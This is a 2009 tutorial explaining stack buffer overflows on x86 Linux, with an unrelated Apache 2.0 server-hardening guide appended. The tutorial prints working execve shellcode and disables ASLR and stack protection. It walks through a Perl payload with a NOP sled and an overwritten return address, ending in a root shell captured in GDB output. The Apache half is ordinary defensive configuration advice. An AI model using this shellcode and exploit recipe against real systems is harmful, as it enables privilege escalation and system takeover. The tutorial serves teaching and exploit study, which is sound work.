Buffer Overflows Explained [Rev. A - 4/12/09] By: deLusion`

Programmers always need to be careful about the security of the software they write. Every application is vulnerable in some form, and code is always being looked over by someone. Buffer overflows are one of the most popular attacks on any application, because this class of bug is so easily overlooked in the author’s code. Along with being popular, buffer overflow attacks are very dangerous from a system security standpoint: an attacker exploiting the vulnerability can execute arbitrary code, usually aimed at gaining root privileges on the system.

Buffers, also called arrays in C/C++, are contiguous blocks of memory for storing a specific data type. An example of a buffer is shown here:

CODE
char buffer[512];



The storage type char is assigned to the newly declared array, referred to as buffer, which now has 512 bytes of allocated storage space. An issue arises when a write to the buffer reaches and leaps over its specified storage limit unchecked. This is what we call a buffer overflow: neighbouring blocks of memory are overwritten as a result of passing the space limit. In a *nix environment, a buffer overflow usually confronts us with something known as a segmentation fault, segfault for short. Segmentation faults occur when an application tries to write to memory in an incorrect fashion, possibly to locations that are read-only. On a Windows OS, these errors are reported differently, as a STATUS_ACCESS_VIOLATION exception.

The most important thing to remember about buffer overflow vulnerabilities is that when one is successfully exploited and a shell is spawned, the shell can only take on the permission level of the application that was exploited. Basically, the only way to obtain root on a system through a buffer overflow vulnerability is if the exploited application is run by the root account, such as a system service. The main part of exploiting a buffer overflow vulnerability successfully is the code to be executed, also known as shellcode, which is made up of opcodes. Opcodes, short for operation codes, are specific instructions to the processor in machine code format. For simplicity’s sake, I will not be showing you how to create your own shellcode from scratch, at least not in this specific article. I will be using sample shellcode provided by milw0rm for a simple shell spawn.

Machine code is system dependent, meaning that this shellcode is only designed to work with *nix x86 environments. If the provided shellcode doesn't work for you, take a look around on milw0rm, or any site that provides shellcode matching your system architecture.
CODE
\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80



The 22-byte shellcode presented is a set of instructions to execute a shell on the system. As said before, the shell that is spawned only gains the permissions of the application it was spawned from.

The second most important part of a successful exploitation is the NOP sled. NOP is a machine instruction whose name stands for No-OPeration; the processor steps over each one until it reaches the next real instruction, like a stream flowing in one direction towards the bigger body of water, here the rest of the instructions to be executed. On x86 a NOP is the opcode “\x90”, and NOPs are usually required for buffer overflow exploitation. A group of NOPs used in a buffer overflow attack is called a NOP sled, the name relating to the flow of execution: if the return address lands on any NOP in the group, execution slides down the sled until it reaches something else to execute.

An exception to the NOP sled requirement is the use of environment variables. System-wide environment variables can be viewed with the env command. The difference between the addresses of the shellcode and the filename can then be calculated to find the exact location of the shellcode stored in the specified environment variable. However, this method will not be shown in detail in this article.

Last but not least, garbage data and a correct return address are required to complete a buffer overflow exploit. Garbage data is any data used to fill the rest of the buffer; it doesn’t matter what it is as long as it contains no null byte, which would end the string. The return address is what ends up in the Instruction Pointer register, also known as EIP. EIP tells the processor which memory address to execute next. When a buffer is overflowed, the 4-byte saved EIP is written over by some of the garbage data. EIP always points to the next instruction to be executed, which is very rewarding for us now that we have the power to overwrite it.

Before we start, we need to change a security setting in Linux that randomizes the address space layout. This setting must be changed for basic buffer overflows; more advanced overflows can get around this safety precaution. In bash, enter the following command:

CODE
echo 0 > /proc/sys/kernel/randomize_va_space



That’s all you need to change to make this basic buffer overflow work.

Now that we know how all this works, how about we put it to good use? Let’s use this piece of vulnerable code just as an example:

vuln.c
CODE
/* the header names did not survive in this copy of the article;
   stdio.h and stdlib.h are assumed, string.h is needed for strcpy() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int copy(char *string) {
    char buffer[1024];
    strcpy(buffer, string);   /* no length check: this is the overflow the article is about */
    return 1;
}

int main(int argc, char *argv[]) {
    copy(argv[1]);
    return 1;
}


Note, if you are using Ubuntu as your OS, you must pass these arguments to GCC when compiling:
CODE
-fno-stack-protector -z execstack

The first disables stack protection, the second makes the stack executable.

This code is not too complicated; I’m only going to stay basic in this article. In this example we have a 1024-byte buffer and the very insecure copy() function shown above. That function uses strcpy() from the string.h header, which, with no length check, copies a string of any size from source to destination. As you have probably figured, this is not good at all: anyone can overflow the buffer array. Let’s get started with this simple vulnerability.
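For contrast, here is a bounded version of the same copy() routine, written as an added example for this page rather than code from the original article. It refuses any input that does not fit in the 1024-byte buffer together with its terminator and always leaves the destination NUL-terminated; copy_bounded(), copy_of_length() and BUF_SIZE are names chosen for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example: the article's copy() rebuilt on top of a bounded copy.
 * copy_bounded, copy_of_length and BUF_SIZE are names chosen here;
 * BUF_SIZE matches the 1024-byte buffer in vuln.c. */
#define BUF_SIZE 1024

/* Bounded copy: measures src only as far as dst can hold, refuses input
 * with no room for the terminator, and always leaves dst NUL-terminated
 * so later string functions cannot run off the end.
 * Returns 0 on success, -1 when the input was rejected. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;

    size_t len = 0;
    while (len < dst_size && src[len] != '\0')   /* never scans past dst_size */
        len++;

    if (len == dst_size) {          /* src is dst_size bytes or longer: too long */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);      /* +1 copies the terminating NUL as well */
    return 0;
}

/* Same shape as the article's copy(), but the length is checked.
 * Returns 1 when the string fit, 0 when it was rejected. */
int copy(const char *string)
{
    char buffer[BUF_SIZE];
    return copy_bounded(buffer, sizeof buffer, string) == 0 ? 1 : 0;
}

/* Helper for experiments: builds a string of n 'A's and feeds it to copy().
 * n = 1023 is the longest input that fits together with its terminator. */
int copy_of_length(size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        return -1;
    memset(s, 'A', n);
    s[n] = '\0';
    int r = copy(s);
    free(s);
    return r;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 2;
    }
    if (copy(argv[1]) == 1)
        puts("copied");
    else
        puts("rejected: input does not fit in the 1024-byte buffer");
    return 0;
}
```

Feeding this version the 1032-byte string built later in the article makes copy() return 0 instead of writing over the saved frame pointer and return address; the size check, not the compiler flags, is what removes the vulnerability.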

Here is the format in which you need to sort your shellcode, garbage data, and return address:
CODE
[ GARBAGE DATA ] -> [ NOP ] -> [ SHELLCODE ] -> [ RET ]



We now need to calculate the amount needed for each field, excluding the return address which is always 4 bytes.

Our buffer size is 1024 bytes, so we need to work out how much garbage data we’re going to need. Just for safe measure we’re going to use 150 NOPs, so that if we are off on the return address we still have a good chance of hitting the sled.

1024 - 150 = 874

The example shellcode is 22 bytes.

874 - 22 = 852

The EIP needs to be overwritten so we are going to add 4 bytes.

852 + 4 = 856

Before we get started writing statements to exploit this application, I want to point this out:
CODE
delusion@deLusive:~/code/overflow$ ls -l
total 16
-rwxr-xr-x 1 root root 11997 2009-04-12 13:03 vuln
-rw-r--r-- 1 root root 212 2009-04-12 13:03 vuln.c


The owner of the file is root, so this application will be running with root privileges, simulating the effect of a real-world service being attacked by a buffer overflow exploit.

Moving onto the actual exploitation, we now know how much garbage data we’re going to use to fill most of the buffer. Let’s write a quick Perl one-liner to build the input for us, and feed it to the program inside GDB, the GNU Debugger.

CODE
perl -e'print "A"x856,"\x90"x150,"\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","YYYY"'



Now we’re ready to use GDB to debug this. I set YYYY as the return address temporarily for debugging purposes.

CODE
delusion@deLusive:~/code/overflow$ gdb vuln -q
(gdb) run `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","YYYY"'`
Starting program: /home/delusion/code/overflow/vuln `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","YYYY"'`

Program received signal SIGSEGV, Segmentation fault.
0x59595959 in ?? ()



You might have been able to spot something already. 0x59 is hex for Y, which is what has corrupted EIP. Let’s take a look at the registers.

CODE
(gdb) i r
eax 0x1 1
ecx 0xbfffeb38 -1073747144
edx 0x409 1033
ebx 0xb7fc1ff4 -1208213516
esp 0xbfffef40 0xbfffef40
ebp 0x80cde189 0x80cde189
esi 0xb8000ce0 -1207956256
edi 0x0 0
eip 0x59595959 0x59595959


As you can see, EIP was overwritten with four bytes of ‘Y’. Now we need to find the general location of the NOP sled to get an approximate return address.

CODE
(gdb) x/200xb $esp
……
0xbffff4b8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4c0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4c8: 0x41 0x41 0x41 0x90 0x90 0x90 0x90 0x90
0xbffff4d0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4d8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4e0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4e8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4f0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4f8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff500: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff508: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff510: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff518: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff520: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff528: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff530: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff538: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff540: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff548: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff550: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff558: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff560: 0x90 0xb0 0x0b 0x99 0x52 0x68 0x2f 0x2f
0xbffff568: 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e 0x89
0xbffff570: 0xe3 0x52 0x53 0x89 0xe1 0xcd 0x80 0x59
0xbffff578: 0x59 0x59 0x59 0x00 0x43 0x50 0x4c 0x55


Notice where the NOPs end. The first byte of data after them is 0xb0, the beginning of our shellcode. The best thing to do is to pick a return address somewhere towards the middle of the sled; I’ll use 0xbffff4f0 for this example. The x86 architecture is little-endian, which is always a good thing to remember: the least significant byte is stored first, so you need to reverse the bytes of that memory address. Your return address is now going to be:

CODE
\xf0\xf4\xff\xbf


Now you are all set and ready to go to initiate this attack on the vulnerable application.

CODE
(gdb) run `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\xf0\xf4\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/delusion/code/overflow/vuln `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\xf0\xf4\xff\xbf"'`
Executing new program: /bin/bash
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
sh-3.1# whoami
root
sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),17(au
dio),18(video),19(cdrom),26(tape),83(plugdev)
sh-3.1#



Now that wasn’t too hard, was it?


reference:r00tsecurity...

Apache 2.0 Hardening Guide

Technical Reference: Apache 2.0 DMZ Secure Server Install

Overview

This document is a guide to installing and hardening an Apache 2.0 web server to common security standards. It will guide you through practical measures to harden your Apache server, by way of example.

Because a web server is often placed at the edge of the network, it is one of the most vulnerable services to attack. Therefore, it’s vital that you follow this guide to ensure that:

1) The opportunity to compromise the web server is limited.

2) Should the web server be compromised, the damage potential to the rest of the network, data, and systems is limited.
1. Prepare the host operating system


1.1 Install and secure the host operating system.

Follow the hardening guidelines from the Center for Internet Security. Hardening the host O/S ensures that, should someone compromise the security of your web server, the amount of damage that they could inflict will be minimized.



1.2 Create the directories to hold the Apache files

It’s important to separate the binaries (/bin), documents (/htdocs), and logs (/logs) into separate partitions on the system. You can choose whatever root you want, but this example will use /opt/apache2 as the root directory for the Apache web server.



1.3 Create the host groups for administering and running the server.

Create a distinct group for all the users who will have permission to change the configuration, start, and stop the web server. For example, if you want to call the group “webadmin”, create it like this:

# groupadd webadmin

Create a distinct group for the web server user – no one will actually log into this group; it is used only to hold the userid that runs the web server. For example, if you want to call that group “webserv”, create it like this:

# groupadd webserv

Take note that you should not create a “web developer” group on this host. Since this is a hardened production host you must not provide web developers login accounts on this system. Instead, developers should deploy documents and code to the server using your code/content deployment system, such as Kintana’s Apps*Integrity.


1.4 Create an unprivileged host user id to run the server.

Never run the web server as root; if the web server is ever compromised, the attacker will have complete control over the system. Instead, the best way to reduce your exposure to attack when running a web server is to create a unique unprivileged userid for the server application. The userid nobody is often used for this purpose, but a userid and group that are unique to the web server is a more secure solution.

By default the web server uses privileged ports (ports 80 and 443) and, when configured for secure operation, must have root privileges to open its log files and start the daemon. (Therefore, the web server daemon will have to be started as “root”, unless you configure it to use a port higher than 1024.) Once the server's startup tasks are complete, all active instances can run as the unprivileged user.

Use the following command line entries as patterns for creating a group and user for the web server. Here’s an example if you were to use “webserv” as the user:

# useradd -d /opt/apache2/htdocs -g webserv -c "Web Server" webserv

1.5 Lock down the web server account

It’s important that no one can successfully execute a password guessing attack against this account, so in this step we’ll restrict the account so that no one can log into it.

1.5.1 Issue this command to lock the password for the web server account:

# passwd -l webserv

Password changed.

1.5.2 To be sure the account is locked, issue the command:

# grep webserv /etc/shadow

…a :!: at the beginning of the line indicates that the password is locked.

1.5.3 Issue this command to remove the shell for this account:

# usermod -s /bin/false webserv

1.5.4 To be sure the account is locked, issue the command:

# grep webserv /etc/passwd

…/bin/false at the end of the line indicates that the shell is set to a non-existent shell.

1.5.5 Test the web server account to be sure you can’t log in. Issue this command to try to log in:

> login webserv
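The two grep checks in 1.5.2 and 1.5.4 are easy to misread by eye on a busy host. As an added example that is not part of this guide, the following C program performs the same two checks programmatically over constructed /etc/shadow and /etc/passwd contents: the password field must begin with “!” (what passwd -l writes) or “*”, and the login shell must be /bin/false or a nologin shell. The sample entries and the function names are ours; an empty password field is treated as not locked, since that would allow login with no password at all.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not part of the guide: the checks behind steps 1.5.2 and
 * 1.5.4, run over constructed /etc/shadow and /etc/passwd contents.
 * The function names and the sample entries are ours. */

const char *SAMPLE_SHADOW =
    "root:$1$saltsalt$0123456789abcdefghijkl:14345:0:99999:7:::\n"
    "alice:$1$saltsalt$0123456789abcdefghijkl:14345:0:99999:7:::\n"
    "webserv:!:14345:0:99999:7:::\n";

const char *SAMPLE_PASSWD =
    "root:x:0:0:root:/root:/bin/bash\n"
    "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n"
    "webserv:x:501:501:Web Server:/opt/apache2/htdocs:/bin/false\n";

/* Copy colon-separated field `idx` (0-based) of the line starting at `line`
 * into out, never reading past the end of that line.
 * Returns 1 if the field exists, 0 if the line has too few fields. */
static int field(const char *line, int idx, char *out, size_t out_size)
{
    const char *p = line;
    for (int i = 0; i < idx; i++) {
        size_t skip = strcspn(p, ":\n");
        if (p[skip] != ':')          /* hit end of line before field idx */
            return 0;
        p += skip + 1;
    }
    size_t len = strcspn(p, ":\n");
    if (len >= out_size)
        len = out_size - 1;
    memcpy(out, p, len);
    out[len] = '\0';
    return 1;
}

/* Step 1.5.2: a shadow entry is locked when its hash field begins with
 * '!' (passwd -l) or '*' (no password ever set). An empty hash field is
 * the opposite problem, login with no password, so it counts as unlocked. */
int shadow_entry_locked(const char *line)
{
    char hash[256];
    if (!field(line, 1, hash, sizeof hash))
        return 0;
    return hash[0] == '!' || hash[0] == '*';
}

/* Step 1.5.4: the login shell is field 7 of /etc/passwd. */
int passwd_entry_shell_disabled(const char *line)
{
    char shell[256];
    if (!field(line, 6, shell, sizeof shell))
        return 0;
    return strcmp(shell, "/bin/false") == 0
        || strcmp(shell, "/sbin/nologin") == 0
        || strcmp(shell, "/usr/sbin/nologin") == 0;
}

/* Find the line for `user` in a file image, as `grep ^user: file` would.
 * Returns a pointer to the start of that line, or NULL. */
static const char *find_user_line(const char *file, const char *user)
{
    size_t ulen = strlen(user);
    for (const char *p = file; p && *p; ) {
        if (strncmp(p, user, ulen) == 0 && p[ulen] == ':')
            return p;
        p = strchr(p, '\n');
        if (p)
            p++;
    }
    return NULL;
}

/* 1 if the account cannot be used to log in (password locked AND shell
 * disabled), 0 if either check fails, -1 if the user is not in both files. */
int account_login_disabled(const char *shadow, const char *passwd, const char *user)
{
    const char *s = find_user_line(shadow, user);
    const char *p = find_user_line(passwd, user);
    if (s == NULL || p == NULL)
        return -1;
    return shadow_entry_locked(s) && passwd_entry_shell_disabled(p);
}

int main(void)
{
    const char *users[] = { "webserv", "alice", "nobody_here" };
    for (size_t i = 0; i < sizeof users / sizeof users[0]; i++)
        printf("%-12s login disabled: %d\n", users[i],
               account_login_disabled(SAMPLE_SHADOW, SAMPLE_PASSWD, users[i]));
    return 0;
}
```

On a real host you would read the two files (as root, since /etc/shadow is not world-readable) into memory and pass their contents in place of the constructed samples; a result of 0 for the web server account means one of steps 1.5.1 or 1.5.3 did not take effect.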


2. Download and verify Apache source code



By default, web servers return information about the product and version they are running in the Server variable of the HTTP header. This information can be very useful to hackers, enabling them to target attacks to that specific server. To prevent that information from being returned from the web server, this step shows you how to modify that header and build your own copy of the web server.



Because web servers often host sensitive information, or allow users to log in with plain-text passwords, it’s important to encrypt the HTTP traffic. Therefore, this section will show you how to configure mod_ssl on your web server.



Note: Don’t build the web server on your production, hardened host. Build it on a staging or development server (with identical O/S), and then copy it to your production host.



These steps will guide you through downloading Apache source code, validating it, compiling it, and installing it. We don’t recommend use of pre-compiled or DSO versions. DSO versions may allow a hacker to introduce new “features” without having to recompile the code.



If you intend to add other modules to your Apache web server installation, repeat the validation steps below for each module you add.


2.1 Download the latest version of Apache 2.0

Ensure that you retrieve the latest copy, so that you have cumulative bug fixes and security patches. You can download it from the Apache site.

From here, download four files:

1) The Apache source code itself, called something like httpd-2.0.45.tar.gz.

2) The PGP keys for the Apache signers: a file named “KEYS”.

3) The PGP signature for this source distribution, called something like httpd-2.0.45.tar.gz.asc.

4) The MD5 checksum for this source distribution, called something like httpd-2.0.45.tar.gz.md5.

wget http://www.apache.org/dist/httpd/httpd-2.0.45.tar.gz
wget http://www.apache.org/dist/httpd/KEYS
wget http://www.apache.org/dist/httpd/httpd-2.0.45.tar.gz.asc
wget http://www.apache.org/dist/httpd/httpd-2.0.45.tar.gz.md5


2.2 Verify PGP signature for the Apache source

To ensure that you have an authentic version from the Apache Group, and that it’s not been tampered with (remember, there are many mirrors from which you can download the Apache source), you should check the PGP signature. If you don’t have PGP installed on this server, you can validate these files on another machine.

a) If you don’t already have them in your PGP keyring, import the public keys from the Apache Group into your keyring:

~> pgp -ka KEYS

b) Check the PGP signature:

~> pgp httpd-2.0.45.tar.gz.asc

…if the signature is correct, you should get something similar to this:

-- CUT --
File 'httpd-2.0.45.tar.gz.asc' has signature, but with no text.
Text is assumed to be in file 'httpd-2.0.45.tar.gz'.
Good signature from user "Justin R. Erenkrantz".
Signature made 2003/03/31 07:49 GMT

WARNING: Because this public key is not certified with a trusted signature, it is not known with high confidence that this public key actually belongs to: "Justin R. Erenkrantz".

The fact that it says “Good signature from…” is what we’re looking for here. The WARNING indicates that we’ve not verified this key through a third party, which is acceptable here.



2.3 Verify the MD5 checksum for the Apache source.

MD5 is a way to validate the integrity of the file itself, much more reliable than simple checksums and similar methods. Normally, mismatches in the MD5 checksum for the Apache source are the result of download errors or file corruption. If you don’t have MD5 on your system, you can download it from here.

Compare the results of these two commands – visually inspect them to ensure they match (if they don’t, download the file again):

~> pwd
/usr/local/build

~> cat httpd-2.0.45.tar.gz.md5
MD5 (httpd-2.0.45.tar.gz) = 1f33e9a2e2de06da190230fa72738d75

~> md5 httpd-2.0.45.tar.gz
MD5 (httpd-2.0.45.tar.gz) = 1f33e9a2e2de06da190230fa72738d75



2.4 Extract the zipped Apache source file.

Finally, you need to unzip and untar the source file.

~> pwd
/usr/local/build

~> tar xvfz httpd-2.0.45.tar.gz

This will create a new directory under your current one, named “httpd-2.0.45”.
3. Create SSL certificates



SSL support requires an SSL library on your system, such as OpenSSL. If you’re not sure how to find and install it, look at the Apache 1.3 hardening guide. This section will walk you through configuring your SSL certificate for encrypting your HTTP traffic. It will help you build a validated certificate and install it on your web server. We’ll add the configured certificates to the Apache configuration in the next step.


3.1 Create a key and certificate request for your web server

Using OpenSSL, the following command will create a 1024-bit private key named “server.key” and generate a certificate signing request (CSR), “server.csr”. You need to have the CSR signed by a Certificate Authority (CA) who can validate your identity. When prompted to input information, note the answers given after each prompt below. (Answer the prompts with the information relevant for your server, of course.)

Note: If you provide a challenge password, you will be unable to start the web server unattended. We don’t recommend providing a challenge password; just leave it blank.

~> pwd
/usr/local/build

~> openssl req -nodes -newkey rsa:1024 -keyout /usr/local/build/server.key -out /usr/local/build/server.csr

Using configuration from /usr/share/ssl/openssl.cnf
Generating a 1024 bit RSA private key
................++++++
.......++++++
writing new private key to 'server.key'
-----
You are about to be asked to enter information that will be incorporated into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:NC
Locality Name (eg, city) []:RTP
Organization Name (eg, company):XianCo Systems, Inc.
Organizational Unit Name (eg, section) []:InfoSec
Common Name (eg, YOUR name) []:xianshield.xianco.com
Email Address []:webmaster@xianshield.xianco.com

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

Most importantly, make sure your “Common Name” above matches the DNS name of your server. The locale information is less important, but we think it’s best to use the locality of the server itself.


3.2 Submit the CSR for validation/signing by a CA.

Next, you need to submit your CSR for signing by a CA. This will eliminate the “warning dialog” that a browser pops up when a user accesses your site: the user’s browser ships with a set of trusted CAs, and it shows no warning when the web server’s site certificate is signed by one of those CAs (such as Verisign or DST) or by a CA you’ve already added to your browser. In this example, we will submit the request to your company’s CA for signing. (You can use another CA if you want.)

Send your request for a certificate to the CA. Include your name, your web server (Apache, in this case), your OS, and of course the .csr (certificate signing request).

3.3 Rename your certificate files

The names aren’t important; they just have to match what’s in conf/ssl.conf. You will receive 2 files from the PKI team. The first file will be your server certificate (and will probably be named .cer); the 2nd file is the certificate chain. Here, we’ll rename them to fit what’s specified in conf/ssl.conf.

mv "XianCo CA (01-03).cer" ca.crt
mv xianshield.cer server.crt

3.4 Copy certificates to your server.

Since you received these certs via email, and they’re now sitting on your laptop, we need to copy both server.crt and ca.crt to the server. We’ll copy them up to /usr/local/build. We’ll move them both to the locations referenced in conf/ssl.conf later.

scp *.crt xianshield:/usr/local/build/.




4. Configure and build the Apache Server

In this section, we’ll configure Apache with SSL and mod_ldap support. As of Apache 2, these are both included modules, and don’t require a separate download.

In order to customize Apache to the extent necessary, we need to download the source for the latest version of Apache. Once that’s complete, we’ll configure and test it.

4.1 Alter the Apache version

We want to remove/modify the default HTTP response header parameter for the “Server:” token to hide the identity of our web server. (You’d be surprised how many vulnerability scanners are looking for specific versions of Apache.) To do this, we must edit a header file prior to compiling the server: ap_release.h, located in ${ApacheSrcDir}/include.

~> pwd
/usr/local/build/httpd-2.0.45/include

~> vi ap_release.h

#define AP_SERVER_BASEVENDOR "Apache Software Foundation"   <-- change this…
#define AP_SERVER_BASEPRODUCT "Apache"                      <-- and this

These are the lines you want to change; change them to remove references to Apache. We’ll hide the actual version using the ServerTokens directive in the httpd.conf file.

Example:

#define AP_SERVER_BASEVENDOR "Network Services"
#define AP_SERVER_BASEPRODUCT "Networks, Inc."


4.2 Configure Apache software for compilation

There are a few standard modules that should be disabled when you set up the Apache web server.

Modules to disable

Generally, the following modules make it easier to configure/support your web server but also give too much information to attackers. We recommend that you disable the following default modules for your production server:

* info: gives out too much information about your web server to potential attackers.
* status: gives out server stats via web pages.
* autoindex: provides directory listings when no index.html file is present.
* imap: provides server-side mapping of index files.
* include: provides server-side includes (.shtml files).
* userdir: translates URLs to user-specific directories.
* auth: you won’t need it – you’ll set up authentication against LDAP via mod_ldap.

Modules to enable

Here are two modules that will provide strong authentication and encryption for your web server. If you have any protected content on your web server, it’s important that you only allow your users to access it over SSL; otherwise your user passwords will be sent in clear text, subject to snooping.

* ssl: Encrypts the traffic from the browser to the web server – an important means of protecting login passwords and sensitive data.
* auth_ldap: Allows you to validate passwords against ldap.xianco.com or another LDAP directory.

A word about LDAP authentication

It’s important that you don’t set up your own userid/password store, since it propagates passwords into insecure locations. Instead, you should modify your configuration to defer authentication to a central store, such as a centrally maintained LDAP. To authenticate against an LDAP store, you need to compile Apache with support for it. In order to use mod_ldap, you’ll need LDAP libraries installed on your system. You can use OpenLDAP or the Netscape Directory SDK for the LDAP client libraries.

Configuration commands

Here’s how to configure Apache with these options:

~> pwd
/usr/local/build/httpd-2.0.45

~> sudo ./configure --prefix=/opt/apache2 \
    --enable-so \
    --enable-ssl \
    --with-ldap \
    --enable-ldap \
    --enable-auth-ldap \
    --disable-info \
    --disable-status \
    --disable-autoindex \
    --disable-imap \
    --disable-include \
    --disable-userdir \
    --disable-auth

checking for chosen layout... Apache
checking for working mkdir -p... yes
checking build system type... sparc64-unknown-linux-gnu
checking host system type... sparc64-unknown-linux-gnu
checking target system type... sparc64-unknown-linux-gnu

Configuring Apache Portable Runtime library ...



4.3 Compile the Apache server



Now that the software is validated and configured, it’s time to compile it. Since you won’t have a compiler on your production host, we’ll compile and install it on a separate server, then tar/compress it and scp it to your production host. You’ll need to run make using “sudo” so that Apache knows it can use ports < 1000.



~> pwd

/usr/local/build/httpd-2.0.45



~> sudo make

===> src

make[1]: Entering directory `/usr/local/build/httpd-2.0.45'

make[2]: Entering directory `/usr/local/build/httpd-2.0.45/src'

===> src/regex

sh ./mkh -p regcomp.c >regcomp.ih




4.4 Install the Apache server

If you have followed our instructions for securing the host, you will have to unpack the distribution and compile it on a separate host. To make your server more secure, use a separate disk partition for your web content. Create a unique mount point for this directory -- htdocs is a good name to use, but make it somewhere outside the ServerRoot directory. You'll need to update /etc/vfstab to mount this partition as part of your server's startup process.

Do not use the htdocs directory included in the distribution as your DocumentRoot. This directory contains user documentation that you don't want to make available to the public as it contains information a potential attacker could use to penetrate your system. (The attacker can deduce what kind of web server you’re running, and hone his attack accordingly.) Move these documentation files into your support directory so the webmasters for your site can refer to them as needed.

You’ll need to install the Apache server using “sudo” privileges or as root.



~> pwd

/usr/local/build/httpd-2.0.45



~> sudo make install

===> [mktree: Creating Apache installation tree]

./src/helpers/mkdir.sh /opt/apache2/bin

./src/helpers/mkdir.sh /opt/apache2/libexec

./src/helpers/mkdir.sh /opt/apache2/man/man1

./src/helpers/mkdir.sh /opt/apache2/man/man8

./src/helpers/mkdir.sh /opt/apache2/conf

..
5. Install SSL certificates

Now that the server is installed, we need to copy the certificate key, server certificate, and CA chain to Apache’s configuration directory.

5.1 Set up the Apache certificate directories

~> pwd
/opt/apache2/conf

~> sudo mkdir ssl.crt ssl.key

5.2 Copy the certificate, CA chain and key to the SSL configuration directory

~> sudo cp /usr/local/build/server.crt ./ssl.crt/.
~> sudo cp /usr/local/build/ca.crt ./ssl.crt/.
~> sudo cp /usr/local/build/server.key ./ssl.key/.


6. Configure the Apache server



Configure the file permissions and runtime settings of the Apache server. It’s important that you place your htdocs, cgi-bin, and logs directories on separately mounted filesystems.

6.1 Configure httpd.conf



Set the following in your httpd.conf file. You can also download an example httpd.conf with these settings here.


Directive and setting / Description and rationale

ServerSignature Off
    Prevents the server from giving version info on error pages.

ServerTokens Prod
    Prevents the server from giving version info in HTTP headers.

Listen 80 (remove)
    Remove the “Listen” directive here; we’ll set it only in ssl.conf, so that the server is available only over https.

User webserv (or whatever you created in step 2 above)
    Ensures that the child processes run as an unprivileged user.

Group webserv (or whatever you created in step 2 above)
    Ensures that the child processes run as an unprivileged group.

ErrorDocument 404 errors/404.html
ErrorDocument 500 errors/500.html
etc.
    To further obscure the web server and version, these point at pages that you should create, rather than using the default Apache error pages.

ServerAdmin webmaster@xianco.com
    Use a mail alias; never use a person’s email address here.

UserDir disabled root
    Remove the UserDir line, since we disabled this module. If you do enable user directories, you’ll need this line to protect root’s files.

<Directory />
    Order Deny,Allow
    Deny from all
</Directory>
    Deny access to the root file system. The container tags did not survive the page’s formatting; the block is reconstructed here as the standard root-directory deny. Note that “Order Deny,Allow” is written without a space after the comma, or Apache rejects the directive.

<LimitExcept GET POST>
    Deny from all
</LimitExcept>
    LimitExcept prevents TRACE (and any other method not listed) from allowing attackers to find a path through cache or proxy servers. The page does not say which methods the author allowed; GET and POST are the usual set, so adjust the list to what your site needs.

<Directory "/opt/apache2/htdocs">
    Options -FollowSymLinks -Includes -Indexes -MultiViews
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>
